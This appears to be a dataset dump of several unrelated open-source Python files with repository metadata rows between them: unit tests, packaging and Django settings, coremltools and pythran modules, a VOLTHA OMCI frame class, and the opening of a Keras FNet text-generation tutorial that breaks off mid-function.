        self.assertEqual(82, self.synergy._N)
        self.assertEqual(16, len(self.synergy._pca.components_))

    def test_fit_joint_messages_empty(self):
        messages = []  # List is okay.
        ret = self.synergy.fit_joint_state_messages(messages)
        self.assertFalse(ret)
        self.assertEqual(0, self.synergy._D)
        self.assertEqual(0, self.synergy._N)
        self.assertFalse(self.synergy.trained)

    def test_fit_bag_file(self):
        fpath = os.path.join(os.path.dirname(__file__), 'data', 'allegro.bag')
        ret = self.synergy.fit_bag_file(fpath)
        self.assertTrue(ret)
        self.assertEqual(16, self.synergy._D)
        self.assertEqual(82, self.synergy._N)
        self.assertEqual(16, len(self.synergy._pca.components_))

    def test_bag_file_nonexistent(self):
        ret = self.synergy.fit_bag_file('/not/a/file')
        self.assertFalse(ret)
        self.assertEqual(0, self.synergy._D)
        self.assertEqual(0, self.synergy._N)
        self.assertFalse(self.synergy.trained)

    def test_compute_grasp_no_data(self):
        ret = self.synergy.compute_grasp([0, 1, 3])
        self.assertIsNone(ret)

    def test_compute_grasp_shape(self):
        self.synergy.fit_joint_state_messages(self.messages)
        ret = self.synergy.compute_grasp([1.0])
        self.assertIsNotNone(ret)
        self.assertEqual((16,), ret.shape)

    def test_compute_grasp_zero_alphas(self):
        # No coefficients -> the mean grasp.
        self.synergy.fit_joint_state_messages(self.messages)
        ret = self.synergy.compute_grasp([])
        ref = self.synergy._pca.mean_
        np.testing.assert_array_almost_equal(ref, ret)

    def test_compute_grasp_sum_alphas(self):
        self.synergy.fit_joint_state_messages(self.messages)
        ret = self.synergy.compute_grasp([1.0, 1.0])
        ref = (self.synergy._pca.components_[0] +
               self.synergy._pca.components_[1] + self.synergy._pca.mean_)
        np.testing.assert_array_almost_equal(ref, ret)

    def test_compute_grasp_many_alphas(self):
        # Make sure we can pass in a large vector of coefficients without
        # failing.
        self.synergy.fit_joint_state_messages(self.messages)
        alphas = np.ones((100,))
        ret = self.synergy.compute_grasp(alphas)
        ref = (np.sum(self.synergy._pca.components_, axis=0) +
               self.synergy._pca.mean_)
        np.testing.assert_array_almost_equal(ref, ret)

    def test_component_ranges_0(self):
        self.synergy.fit_joint_state_messages(self.messages)
        (ret_min, ret_max) = self.synergy.synergy_range(0)
        self.assertAlmostEqual(-1.12507406, ret_min, places=4)
        self.assertAlmostEqual(1.18130298, ret_max, places=4)

    def test_component_ranges_1(self):
        self.synergy.fit_joint_state_messages(self.messages)
        (ret_min, ret_max) = self.synergy.synergy_range(1)
        self.assertAlmostEqual(-0.41370870, ret_min, places=4)
        self.assertAlmostEqual(0.4547809556, ret_max, places=4)

    def test_component_ranges_untrained(self):  # try before training.
        (ret_min, ret_max) = self.synergy.synergy_range(1)
        self.assertEqual(0, ret_min)
        self.assertEqual(0, ret_max)

    def test_component_ranges_negative(self):
        (ret_min, ret_max) = self.synergy.synergy_range(-1)
        self.assertEqual(0, ret_min)
        self.assertEqual(0, ret_max)

    def test_component_ranges_too_big(self):
        (ret_min, ret_max) = self.synergy.synergy_range(100)
        self.assertEqual(0, ret_min)
        self.assertAlmostEqual(0, ret_max)
if __name__ == '__main__':
    # Allow running this test module directly: `python test_synergy.py`.
    unittest.main()
| 35.6 | 78 | 0.669901 |
942bf7150ae77713eedae8e0e8e5284beb197c4a | 528 | py | Python | setup.py | sanAkdam/chime | 1adbddbdddcdc2669086dee60d1bfb2f97535cff | [
"BSD-3-Clause"
] | 8 | 2015-02-05T22:12:41.000Z | 2015-05-15T16:15:14.000Z | setup.py | sanAkdam/chime | 1adbddbdddcdc2669086dee60d1bfb2f97535cff | [
"BSD-3-Clause"
] | 168 | 2015-02-02T23:02:52.000Z | 2015-05-15T21:54:07.000Z | setup.py | codeforamerica/bizarro-cms | 1adbddbdddcdc2669086dee60d1bfb2f97535cff | [
"BSD-3-Clause"
] | 5 | 2016-11-20T15:51:32.000Z | 2021-04-16T09:44:08.000Z | from setuptools import setup
# Packaging metadata for the Chime CMS; `setup` comes from setuptools above.
setup(
    name='Chime',
    version='0.0.0',
    url='https://github.com/chimecms/chime',
    author='Code for America',
    description='Hashing out some ideas about Git, Jekyll, language, and content management',
    packages=['chime', 'chime.httpd', 'chime.publish', 'chime.instantiation'],
    # Ship the HTML templates alongside the Python code.
    package_data={'chime': ['templates/*.html',
                            'templates/macros/*.html',
                            'templates/includes/*.html']},
    install_requires=[],
    entry_points={'console_scripts': []},
)
| 29.333333 | 93 | 0.645833 |
0958ba3a5d2b81acba6617e4399b75a9aed8fed6 | 474 | py | Python | algorithm/Experience.py | YangJW73/PokerDQN | ff3a771f843d4b5ea6e073fd91138b2a744e97ea | [
"MIT"
] | 1 | 2018-03-02T00:49:31.000Z | 2018-03-02T00:49:31.000Z | algorithm/Experience.py | YangJW73/PokerDQN | ff3a771f843d4b5ea6e073fd91138b2a744e97ea | [
"MIT"
] | null | null | null | algorithm/Experience.py | YangJW73/PokerDQN | ff3a771f843d4b5ea6e073fd91138b2a744e97ea | [
"MIT"
] | null | null | null | #!/bin/python
class Experience:
def __init__(self, turn, info_feat, action_feat, reward, next_info_feat, next_available_action_feats):
self.turn = turn
self.info_feat = info_feat
self.action_feat = action_feat
self.reward = reward
self.next_info_feat = next_info_feat
self.next_available_action_feats = next_available_action_feats | 47.4 | 106 | 0.582278 |
d48f9d84c1fa64fa58a492ca5892fb3761fb26c6 | 4,347 | py | Python | third_party/WebKit/Tools/Scripts/webkitpy/style/checkers/test_expectations_unittest.py | wenfeifei/miniblink49 | 2ed562ff70130485148d94b0e5f4c343da0c2ba4 | [
"Apache-2.0"
] | 5,964 | 2016-09-27T03:46:29.000Z | 2022-03-31T16:25:27.000Z | third_party/WebKit/Tools/Scripts/webkitpy/style/checkers/test_expectations_unittest.py | w4454962/miniblink49 | b294b6eacb3333659bf7b94d670d96edeeba14c0 | [
"Apache-2.0"
] | 459 | 2016-09-29T00:51:38.000Z | 2022-03-07T14:37:46.000Z | third_party/WebKit/Tools/Scripts/webkitpy/style/checkers/test_expectations_unittest.py | w4454962/miniblink49 | b294b6eacb3333659bf7b94d670d96edeeba14c0 | [
"Apache-2.0"
] | 1,006 | 2016-09-27T05:17:27.000Z | 2022-03-30T02:46:51.000Z | # Copyright (C) 2010 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
import sys
import unittest
from test_expectations import TestExpectationsChecker
from webkitpy.common.host_mock import MockHost
class ErrorCollector(object):
"""An error handler class for unit tests."""
def __init__(self):
self._errors = []
self.turned_off_filtering = False
def turn_off_line_filtering(self):
self.turned_off_filtering = True
def __call__(self, lineno, category, confidence, message):
self._errors.append('%s [%s] [%d]' % (message, category, confidence))
return True
def get_errors(self):
return ''.join(self._errors)
def reset_errors(self):
self._errors = []
self.turned_off_filtering = False
class TestExpectationsTestCase(unittest.TestCase):
"""TestCase for test_expectations.py"""
def setUp(self):
self._error_collector = ErrorCollector()
self._test_file = 'passes/text.html'
def assert_lines_lint(self, lines, should_pass, expected_output=None):
self._error_collector.reset_errors()
host = MockHost()
checker = TestExpectationsChecker('test/TestExpectations',
self._error_collector, host=host)
# We should have a valid port, but override it with a test port so we
# can check the lines.
self.assertIsNotNone(checker._port_obj)
checker._port_obj = host.port_factory.get('test-mac-leopard')
checker.check_test_expectations(expectations_str='\n'.join(lines),
tests=[self._test_file])
checker.check_tabs(lines)
if should_pass:
self.assertEqual('', self._error_collector.get_errors())
elif expected_output:
self.assertEqual(expected_output, self._error_collector.get_errors())
else:
self.assertNotEquals('', self._error_collector.get_errors())
# Note that a patch might change a line that introduces errors elsewhere, but we
# don't want to lint the whole file (it can unfairly punish patches for pre-existing errors).
# We rely on a separate lint-webkitpy step on the bots to keep the whole file okay.
# FIXME: See https://bugs.webkit.org/show_bug.cgi?id=104712 .
self.assertFalse(self._error_collector.turned_off_filtering)
def test_valid_expectations(self):
self.assert_lines_lint(["crbug.com/1234 [ Mac ] passes/text.html [ Pass Failure ]"], should_pass=True)
def test_invalid_expectations(self):
self.assert_lines_lint(["Bug(me) passes/text.html [ Give Up]"], should_pass=False)
def test_tab(self):
self.assert_lines_lint(["\twebkit.org/b/1 passes/text.html [ Pass ]"], should_pass=False, expected_output="Line contains tab character. [whitespace/tab] [5]")
| 42.617647 | 167 | 0.710835 |
10985db8b686f3114db6b5ac276bcd5310e07426 | 3,764 | py | Python | project_lifeline/settings.py | vix993/project-lifeline | 273bdad6e4d31178995654bbfced9d9e9e665c12 | [
"MIT"
] | 1 | 2021-04-13T14:58:37.000Z | 2021-04-13T14:58:37.000Z | project_lifeline/settings.py | vix993/project-lifeline | 273bdad6e4d31178995654bbfced9d9e9e665c12 | [
"MIT"
] | null | null | null | project_lifeline/settings.py | vix993/project-lifeline | 273bdad6e4d31178995654bbfced9d9e9e665c12 | [
"MIT"
] | null | null | null | """
Django settings for project_lifeline project.
Generated by 'django-admin startproject' using Django 3.1.7.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
import os
from pathlib import Path

# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent

# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to source control; for production it
# should be loaded from an environment variable instead.
SECRET_KEY = 'ch_2uku2qk%7@9u@(6*jl(%%-g8wpb4*61cxee@974)+=lx#84'

# SECURITY WARNING: don't run with debug turned on in production!
# NOTE(review): DEBUG=True while a Heroku host is in ALLOWED_HOSTS suggests
# this setting is also used for the deployed app — confirm and disable there.
DEBUG = True

ALLOWED_HOSTS = ['project-lifeline.herokuapp.com', 'localhost']

# Application definition
INSTALLED_APPS = [
    'rest_framework',
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'survivor'
]

# WhiteNoise is first so it can serve static files before other middleware.
MIDDLEWARE = [
    'whitenoise.middleware.WhiteNoiseMiddleware',
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]

ROOT_URLCONF = 'project_lifeline.urls'

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]

WSGI_APPLICATION = 'project_lifeline.wsgi.application'

# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
# Local default is SQLite; overridden below by dj_database_url when a
# DATABASE_URL environment variable is present (e.g. on Heroku).
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': str(BASE_DIR / 'db.sqlite3'),
    }
}

# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]

# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True

# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
PROJECT_ROOT = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
STATIC_ROOT = os.path.join(PROJECT_ROOT, 'staticfiles')
STATIC_URL = '/static/'

# Extra lookup directories for collectstatic to find static files
STATICFILES_DIRS = (
    os.path.join(PROJECT_ROOT, 'static'),
)

# Add configuration for static files storage using whitenoise
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'

# Merge the production database config (from DATABASE_URL) into the default.
import dj_database_url
prod_db = dj_database_url.config(conn_max_age=500)
DATABASES['default'].update(prod_db)
ed81547d1fca640de21e420e2ea160b65d13bc0e | 1,739 | py | Python | coremltools/__init__.py | Vijayrajsinh/Core-ML | b103f513cfd42cdf5b60f6261448d1ce667f590b | [
"BSD-3-Clause"
] | 1 | 2019-02-08T08:45:32.000Z | 2019-02-08T08:45:32.000Z | coremltools/__init__.py | Vijayrajsinh/Core-ML | b103f513cfd42cdf5b60f6261448d1ce667f590b | [
"BSD-3-Clause"
] | null | null | null | coremltools/__init__.py | Vijayrajsinh/Core-ML | b103f513cfd42cdf5b60f6261448d1ce667f590b | [
"BSD-3-Clause"
] | null | null | null | # Copyright (c) 2017, Apple Inc. All rights reserved.
#
# Use of this source code is governed by a BSD-3-clause license that can be
# found in the LICENSE.txt file or at https://opensource.org/licenses/BSD-3-Clause
"""
Core ML is an Apple framework which allows developers to simply and easily integrate machine
learning (ML) models into apps running on Apple devices (including iOS, watchOS, macOS, and
tvOS). Core ML introduces a public file format (.mlmodel) for a broad set of ML methods
including deep neural networks (both convolutional and recurrent), tree ensembles with boosting,
and generalized linear models. Models in this format can be directly integrated into apps
through Xcode.
Core MLTools in a python package for creating, examining, and testing models in the .mlmodel
format. In particular, it can be used to:
* Convert existing models to .mlmodel format from popular machine learning tools including:
Keras, Caffe, scikit-learn, libsvm, and XGBoost.
* Express models in .mlmodel format through a simple API.
* Make predictions with an .mlmodel (on select platforms for testing purposes).
For more information: http://developer.apple.com/documentation/coreml
"""
# This is the basic Core ML specification format understood by iOS 11.0
SPECIFICATION_VERSION = 1
# New versions for iOS 11.2 features. Models which use these features should have these
# versions, but models created from this coremltools which do not use the features can
# still have the basic version.
_MINIMUM_CUSTOM_LAYER_SPEC_VERSION = 2
_MINIMUM_FP16_SPEC_VERSION = 2
# expose sub packages as directories
from . import converters
from . import proto
from . import models
from .models import utils
from ._scripts.converter import _main
| 42.414634 | 96 | 0.787809 |
bfa1ff92f29f99ed3e74dbc381230c001d89709c | 5,090 | py | Python | pythran/types/conversion.py | davidbrochart/pythran | 24b6c8650fe99791a4091cbdc2c24686e86aa67c | [
"BSD-3-Clause"
] | 1,647 | 2015-01-13T01:45:38.000Z | 2022-03-28T01:23:41.000Z | pythran/types/conversion.py | davidbrochart/pythran | 24b6c8650fe99791a4091cbdc2c24686e86aa67c | [
"BSD-3-Clause"
] | 1,116 | 2015-01-01T09:52:05.000Z | 2022-03-18T21:06:40.000Z | pythran/types/conversion.py | davidbrochart/pythran | 24b6c8650fe99791a4091cbdc2c24686e86aa67c | [
"BSD-3-Clause"
] | 180 | 2015-02-12T02:47:28.000Z | 2022-03-14T10:28:18.000Z | """ Module to convert Python type to Pythonic type. """
from numpy import int8, int16, int32, int64, intp, intc
from numpy import uint8, uint16, uint32, uint64, uintp, uintc
from numpy import float64, float32, complex64, complex128
import numpy
from pythran.typing import List, Dict, Set, Tuple, NDArray, Pointer, Fun
PYTYPE_TO_CTYPE_TABLE = {
numpy.uint: 'npy_uint',
#
complex: 'std::complex<double>',
bool: 'bool',
int: 'long',
float: 'double',
str: 'pythonic::types::str',
slice: 'pythonic::types::slice',
type(None): 'pythonic::types::none_type',
intc: 'int',
intp: 'npy_intp',
int64: 'npy_int64',
int32: 'npy_int32',
int16: 'npy_int16',
int8: 'npy_int8',
uintc: 'unsigned',
uintp: 'npy_uintp',
uint64: 'npy_uint64',
uint32: 'npy_uint32',
uint16: 'npy_uint16',
uint8: 'npy_uint8',
float64: 'double',
float32: 'float',
complex128: 'std::complex<double>',
complex64: 'std::complex<float>',
}
try:
from numpy import float128, complex256
PYTYPE_TO_CTYPE_TABLE[float128] = 'long double'
PYTYPE_TO_CTYPE_TABLE[complex256] = 'std::complex<long double>'
except ImportError:
pass
TYPE_TO_SUFFIX = {
int: "L",
}
def pytype_to_ctype(t):
    """Map a Python/pythran typing annotation to its pythonic C++ type name."""
    if isinstance(t, List):
        return f'pythonic::types::list<{pytype_to_ctype(t.__args__[0])}>'
    if isinstance(t, Set):
        return f'pythonic::types::set<{pytype_to_ctype(t.__args__[0])}>'
    if isinstance(t, Dict):
        key_type, value_type = t.__args__
        return ('pythonic::types::dict<'
                f'{pytype_to_ctype(key_type)},{pytype_to_ctype(value_type)}>')
    if isinstance(t, Tuple):
        declvals = ", ".join(f'std::declval<{pytype_to_ctype(p)}>()'
                             for p in t.__args__)
        return f'decltype(pythonic::types::make_tuple({declvals}))'
    if isinstance(t, NDArray):
        dtype = pytype_to_ctype(t.__args__[0])
        dims = t.__args__[1:]
        ndim = len(dims)
        # Each dimension is either dynamic ('long') or a compile-time extent.
        extents = []
        for s in dims:
            if s.stop == -1 or s.stop is None:
                extents.append('long')
            else:
                extents.append(f'std::integral_constant<long, {s.stop}>')
        pshape = 'pythonic::types::pshape<{}>'.format(','.join(extents))
        arr = f'pythonic::types::ndarray<{dtype},{pshape}>'
        if dims[0].start == -1:
            # A -1 start on the first axis marks a transposed expression.
            return f'pythonic::types::numpy_texpr<{arr}>'
        if any(s.step is not None and s.step < 0 for s in dims):
            # Negative steps force a generalized (sliced) expression.
            slices = ", ".join(['pythonic::types::normalized_slice'] * ndim)
            return f'pythonic::types::numpy_gexpr<{arr},{slices}>'
        return arr
    if isinstance(t, Pointer):
        return f'pythonic::types::pointer<{pytype_to_ctype(t.__args__[0])}>'
    if isinstance(t, Fun):
        result_type = pytype_to_ctype(t.__args__[-1])
        param_types = ", ".join(pytype_to_ctype(arg)
                                for arg in t.__args__[:-1])
        return f'pythonic::types::cfun<{result_type}({param_types})>'
    if t in PYTYPE_TO_CTYPE_TABLE:
        return PYTYPE_TO_CTYPE_TABLE[t]
    raise NotImplementedError(f"{type(t)}:{t}")
def pytype_to_pretty_type(t):
    """Map a Python/pythran typing annotation to the docstring spelling."""
    if isinstance(t, List):
        return f'{pytype_to_pretty_type(t.__args__[0])} list'
    if isinstance(t, Set):
        return f'{pytype_to_pretty_type(t.__args__[0])} set'
    if isinstance(t, Dict):
        key_type, value_type = t.__args__
        return (f'{pytype_to_pretty_type(key_type)}:'
                f'{pytype_to_pretty_type(value_type)} dict')
    if isinstance(t, Tuple):
        inner = ", ".join(pytype_to_pretty_type(p) for p in t.__args__)
        return f'({inner})'
    if isinstance(t, NDArray):
        dtype = pytype_to_pretty_type(t.__args__[0])
        dims = t.__args__[1:]
        ndim = len(dims)
        # Dynamic extents print as ':', fixed extents as their size.
        extents = ','.join(':' if s.stop in (-1, None) else str(s.stop)
                           for s in dims)
        arr = f'{dtype}[{extents}]'
        # it's a transpose!
        if dims[0].start == -1:
            return f'{arr} order(F)'
        if any(s.step is not None and s.step < 0 for s in dims):
            return '{0}[{1}]'.format(dtype, ','.join(['::'] * ndim))
        return arr
    if isinstance(t, Pointer):
        return f'{pytype_to_pretty_type(t.__args__[0])}*'
    if isinstance(t, Fun):
        result_type = pytype_to_pretty_type(t.__args__[-1])
        param_types = ", ".join(pytype_to_pretty_type(arg)
                                for arg in t.__args__[:-1])
        return f'{result_type}({param_types})'
    if t in PYTYPE_TO_CTYPE_TABLE:
        return t.__name__
    raise NotImplementedError(f"{type(t)}:{t}")
| 36.357143 | 79 | 0.565619 |
1f06e5f5cd5e5322252fd001472a08e5acd9913f | 7,544 | py | Python | voltha/extensions/omci/omci_frame.py | jcsteven/voltha-b1.4.0-fixed | c4f56bc1a4e8e39248c89e8ed9000cfe6bd90f2c | [
"Apache-2.0"
] | null | null | null | voltha/extensions/omci/omci_frame.py | jcsteven/voltha-b1.4.0-fixed | c4f56bc1a4e8e39248c89e8ed9000cfe6bd90f2c | [
"Apache-2.0"
] | 2 | 2021-03-31T18:39:49.000Z | 2022-02-11T03:40:28.000Z | voltha/extensions/omci/omci_frame.py | jcsteven/voltha-b1.4.0-fixed | c4f56bc1a4e8e39248c89e8ed9000cfe6bd90f2c | [
"Apache-2.0"
] | null | null | null | #
# Copyright 2017 the original author or authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from scapy.fields import ByteField, PacketField, IntField
from scapy.fields import ShortField, ConditionalField
from scapy.packet import Packet
from voltha.extensions.omci.omci_defs import FixedLenField
from voltha.extensions.omci.omci_messages import OmciCreate, OmciDelete, \
OmciDeleteResponse, OmciSet, OmciSetResponse, OmciGet, OmciGetResponse, \
OmciGetAllAlarms, OmciGetAllAlarmsResponse, OmciGetAllAlarmsNext, \
OmciMibResetResponse, OmciMibReset, OmciMibUploadNextResponse, \
OmciMibUploadNext, OmciMibUploadResponse, OmciMibUpload, \
OmciGetAllAlarmsNextResponse, OmciAttributeValueChange, \
OmciTestResult, OmciAlarmNotification, \
OmciReboot, OmciRebootResponse, OmciGetNext, OmciGetNextResponse
from voltha.extensions.omci.omci_messages import OmciCreateResponse
class OmciFrame(Packet):
    """Scapy packet describing a full OMCI (ONU Management and Control
    Interface) frame.

    Layout: a 2-byte transaction id, a 1-byte message type, the 0x0a
    device-identifier byte, a fixed-length (36 byte) message body whose
    concrete Packet class is selected by ``message_type``, and a constant
    trailer.
    """
    name = "OmciFrame"

    # Every OMCI message type shares the same frame layout; only the class
    # used to parse the 36-byte "omci_message" payload differs.  Build one
    # ConditionalField per known message class instead of spelling out a
    # near-identical stanza for each (the original had ~25 copies).
    # Order is irrelevant for dissection because at most one condition can
    # match a given message_type.
    _message_classes = [
        OmciCreate,
        OmciCreateResponse,
        OmciDelete,
        OmciDeleteResponse,
        OmciSet,
        OmciSetResponse,
        OmciGet,
        OmciGetResponse,
        OmciGetAllAlarms,
        OmciGetAllAlarmsResponse,
        OmciGetAllAlarmsNext,
        OmciGetAllAlarmsNextResponse,
        OmciMibUpload,
        OmciMibUploadResponse,
        OmciMibUploadNext,
        OmciMibUploadNextResponse,
        OmciMibReset,
        OmciMibResetResponse,
        OmciAlarmNotification,
        OmciAttributeValueChange,
        OmciTestResult,
        OmciReboot,
        OmciRebootResponse,
        OmciGetNext,
        OmciGetNextResponse,
    ]

    fields_desc = [
        ShortField("transaction_id", 0),
        ByteField("message_type", None),
        ByteField("omci", 0x0a),
    ] + [
        ConditionalField(
            FixedLenField(
                PacketField("omci_message", None, klass), align=36),
            # Bind klass as a default argument so each lambda captures its
            # own message class rather than the loop variable.
            lambda pkt, klass=klass: pkt.message_type == klass.message_id)
        for klass in _message_classes
    ] + [
        # TODO add entries for remaining OMCI message types
        IntField("omci_trailer", 0x00000028)
    ]

    # We needed to patch the do_dissect(...) method of Packet, because
    # it wiped out already dissected conditional fields with None if they
    # referred to the same field name. We marked the only new line of code
    # with "Extra condition added".
    def do_dissect(self, s):
        """Dissect ``s`` into this packet's fields.

        Identical to scapy's Packet.do_dissect except for the guard that
        prevents a later ConditionalField (whose condition is False and
        therefore yields None) from overwriting the "omci_message" value
        dissected by an earlier matching ConditionalField.
        """
        raw = s
        self.raw_packet_cache_fields = {}
        for f in self.fields_desc:
            if not s:
                break
            s, fval = f.getfield(self, s)
            # We need to track fields with mutable values to discard
            # .raw_packet_cache when needed.
            if f.islist or f.holds_packets:
                self.raw_packet_cache_fields[f.name] = f.do_copy(fval)
            # Extra condition added
            if fval is not None or f.name not in self.fields:
                self.fields[f.name] = fval
        assert(raw.endswith(s))
        self.raw_packet_cache = raw[:-len(s)] if s else raw
        self.explicit = 1
        return s
| 49.960265 | 84 | 0.680806 |
737718b168477bc0ce2b08974cea753ecabf960c | 13,853 | py | Python | examples/nlp/text_generation_fnet.py | IMvision12/keras-io | 44997b0610db078e1109d0dbca58db8319dbc744 | [
"Apache-2.0"
] | null | null | null | examples/nlp/text_generation_fnet.py | IMvision12/keras-io | 44997b0610db078e1109d0dbca58db8319dbc744 | [
"Apache-2.0"
] | null | null | null | examples/nlp/text_generation_fnet.py | IMvision12/keras-io | 44997b0610db078e1109d0dbca58db8319dbc744 | [
"Apache-2.0"
] | 1 | 2022-01-21T11:34:34.000Z | 2022-01-21T11:34:34.000Z | """
Title: Text Generation using FNet
Author: [Darshan Deshpande](https://twitter.com/getdarshan)
Date created: 2021/10/05
Last modified: 2021/10/05
Description: FNet transformer for text generation in Keras.
"""
"""
## Introduction
The original transformer implementation (Vaswani et al., 2017) was one of the major
breakthroughs in Natural Language Processing, giving rise to important architectures such BERT and GPT.
However, the drawback of these architectures is
that the self-attention mechanism they use is computationally expensive. The FNet
architecture proposes to replace this self-attention attention with a leaner mechanism:
a Fourier transformation-based linear mixer for input tokens.
The FNet model was able to achieve 92-97% of BERT's accuracy while training 80% faster on
GPUs and almost 70% faster on TPUs. This type of design provides an efficient and small
model size, leading to faster inference times.
In this example, we will implement and train this architecture on the Cornell Movie
Dialog corpus to show the applicability of this model to text generation.
"""
"""
## Imports
"""
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras import layers
import os
import re
# Defining hyperparameters
VOCAB_SIZE = 8192  # vocabulary size for TextVectorization
MAX_SAMPLES = 50000  # maximum number of (question, answer) pairs to load
BUFFER_SIZE = 20000  # shuffle buffer size for the training dataset
MAX_LENGTH = 40  # maximum token length of a tokenized sentence
EMBED_DIM = 256  # token/position embedding dimension
LATENT_DIM = 512  # hidden size of the feed-forward projections
NUM_HEADS = 8  # number of attention heads in the decoder
BATCH_SIZE = 64  # examples per training batch
"""
## Loading data
We will be using the Cornell Dialog Corpus. We will parse the movie conversations into
questions and answers sets.
"""
# Download and extract the Cornell Movie Dialogs corpus into the Keras cache.
path_to_zip = keras.utils.get_file(
    "cornell_movie_dialogs.zip",
    origin="http://www.cs.cornell.edu/~cristian/data/cornell_movie_dialogs_corpus.zip",
    extract=True,
)
# The archive extracts into a "cornell movie-dialogs corpus" directory
# next to the downloaded zip.
path_to_dataset = os.path.join(
    os.path.dirname(path_to_zip), "cornell movie-dialogs corpus"
)
# movie_lines.txt maps a line ID to the utterance text;
# movie_conversations.txt lists the ordered line IDs of each conversation.
path_to_movie_lines = os.path.join(path_to_dataset, "movie_lines.txt")
path_to_movie_conversations = os.path.join(path_to_dataset, "movie_conversations.txt")
def load_conversations():
    """Parse the corpus into parallel question/answer lists.

    Consecutive utterances of each conversation become (input, output)
    pairs.  Loading stops as soon as MAX_SAMPLES pairs are collected.
    """
    # Map each line ID (e.g. "L1045") to its utterance text.
    id2line = {}
    with open(path_to_movie_lines, errors="ignore") as file:
        for raw in file.readlines():
            fields = raw.replace("\n", "").split(" +++$+++ ")
            id2line[fields[0]] = fields[4]

    inputs, outputs = [], []
    with open(path_to_movie_conversations, "r") as file:
        for raw in file.readlines():
            fields = raw.replace("\n", "").split(" +++$+++ ")
            # fields[3] looks like "['L194', 'L195', ...]"; strip the outer
            # brackets and the quotes around each ID.
            conversation = [token[1:-1] for token in fields[3][1:-1].split(", ")]
            # Pair each utterance with the one that follows it.
            for first, second in zip(conversation, conversation[1:]):
                inputs.append(id2line[first])
                outputs.append(id2line[second])
                if len(inputs) >= MAX_SAMPLES:
                    return inputs, outputs
    return inputs, outputs
questions, answers = load_conversations()
# Splitting training and validation sets
train_dataset = tf.data.Dataset.from_tensor_slices((questions[:40000], answers[:40000]))
val_dataset = tf.data.Dataset.from_tensor_slices((questions[40000:], answers[40000:]))
"""
### Preprocessing and Tokenization
"""
def preprocess_text(sentence):
    """Normalize a sentence tensor and wrap it in [start]/[end] markers."""
    text = tf.strings.lower(sentence)
    # Detach punctuation from the preceding word so it tokenizes separately.
    text = tf.strings.regex_replace(text, r"([?.!,])", r" \1 ")
    # Collapse runs of whitespace into a single space.
    text = tf.strings.regex_replace(text, r"\s\s+", " ")
    # Replace anything that is not a lowercase letter or kept punctuation.
    text = tf.strings.regex_replace(text, r"[^a-z?.!,]+", " ")
